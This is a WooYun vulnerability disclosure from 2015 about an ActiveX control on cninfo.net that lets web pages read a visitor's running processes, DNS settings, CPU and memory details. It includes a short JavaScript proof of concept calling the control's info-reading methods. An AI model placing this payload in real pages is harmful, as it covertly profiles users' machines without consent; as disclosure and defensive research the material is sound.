WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150498

漏洞标题：cninfo.net/QOEINFO/ActiveX控件信息泄露

相关厂商：cninfo.net

漏洞作者： blast

提交时间：2015-10-30 22:03

修复时间：2015-12-17 14:48

公开时间：2015-12-17 14:48

漏洞类型：用户敏感数据泄漏

危害等级：中

自评Rank：7

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2015-10-30： 细节已通知厂商并且等待厂商处理中
2015-11-04： 厂商已经确认，细节仅向厂商公开
2015-11-07： 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-12-29： 细节向核心白帽子及相关领域专家公开
2016-01-08： 细节向普通白帽子公开
2016-01-18： 细节向实习白帽子公开
2015-12-17： 细节向公众公开

简要描述：

系统进程列表、网络负载、DNS设置、CPU名、内存使用、CPU负载等均可远程读取。没必要开这么多接口吧。
页面写着电信宽带助手，不过不知道是不是电信的，百度了下好多站用的cninfo.net的子域名

详细说明：

漏洞证明：

<object id="qoeinfo"
		classid="CLSID:B2F9A248-3AB5-493F-A7F8-5B7A9D026ED2"
		style="display: none;"></object>
<script>
var softwarecount = 0;
	qoeinfo.GetProcessInfo();
	processlist = qoeinfo.strProcessInfo.toLocaleLowerCase();
	alert(processlist);
	/*qoeinfo.GetDnsServer();
	var dnsserver = qoeinfo.strDnsServer;
	qoeinfo.GetNumComputer();
	var fcw = qoeinfo.strNumComputer;
	qoeinfo.GetMemUsage();
	qoeinfo.GetMemSize();
	var memoryusage = qoeinfo.strMemUsage;
	memory = qoeinfo.strMemSize;
	qoeinfo.GetCpuUsage();
	var cpuusage = qoeinfo.strCpuUsage;
	qoeinfo.GetCpuName();
	cpuinfo = qoeinfo.strCpuName;
//qoeinfo.GetNetLoad();
	var load = qoeinfo.strNetLoad;*/
	//alert(load)
</script>

修复方案：

版权声明：转载请注明来源 blast@乌云

漏洞回应